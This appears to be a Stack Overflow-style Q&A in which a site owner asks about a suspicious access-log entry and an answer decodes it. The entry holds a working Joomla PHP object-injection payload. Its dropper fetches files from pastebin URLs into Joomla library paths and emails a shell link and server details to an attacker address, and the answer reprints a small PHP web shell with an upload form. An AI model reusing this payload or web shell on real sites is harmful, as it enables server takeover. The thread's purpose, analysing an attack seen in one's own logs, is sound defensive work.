# MySQL Injection Attempt - How to replicate from access.log?

Tags: php, sql, security, mysqli, sql-injection

I have recently been working on preventing SQL injection in my production Apache/PHP/MySQL web application.

For this, I routinely skim Apache access logs for abnormal requests and occasionally attempt to replicate them if I find them peculiar (anyone have a better recommendation?).

Today, I saw a strange log appear in the access log. I see that an HTTP referrer exists, but I do not have a matching log for the original request. There is also not a matching log in the Apache Error Log that implies it was "denied by server configuration".

Here is the strange log (base_64 decoded):

169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('

```
<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);


$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);


?>
```

'));
fclose($fp);
JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\0\0\0connection\";b:1;}\xf0\xfd\xfd\xfd"

I attempted to replicate this GET request via Postman but it is seen as "an invalid XMLHTTPRequest". I'm not sure how one would normally test this?

I am also not sure what this does (or attempts to do). Any information/theories on what this attempts to do (and if it may have succeeded) would be greatly appreciated.

I theorize it is just a simple attempt to inject SQL via the HTTP referrer into some "framework", but I am not an expert. Thanks in advance for any help.

Comment: You can decode that payload first of all to see its contents just dont eval it

Comment: Interesting, good idea. I have updated my answer by manually decoding the log. (: Haha.

Answer (score 1, accepted):

This is what I got when I decoded it

```
<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
```

Looks like you are using Joomla CMS. There is a file inside library folder lol.php which is being called by the script. Another file /libraries/joomla/wl.php is also malicious file being called. Also the pastebin code is being executed

```
<?php 
// name of the file is: i (it has no extension)
error_reporting(0);

if(isset($_GET["0"]))
    {
        echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';

echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";

?>
```

It is writing the pastebin code to your file /libraries/joomla/jmail.php.

**Conclusion:**

if you are not using Joomla CMS nothing to worry. if yes then you need to check those affected files. Possible malicious files are uploaded to your server.

Comment: Fortunately, I am NOT using Joomla. Thank you for your answer (& @hankypanky in comments), I believe this answers the question. PS: Is leaving the attacker's email in the Question body seen as "bad practice"?

Comment: @RobertSchwindaman Welcome. Honestly I too don't know if its a bad practice, so its better to change the email and also inform the attacker not to try those tricks as you dont use Joomla.

Comment: My counter is: One should think twice about trying to maliciously attack a website they don't own, in general. I know I would if I saw my email on Stack.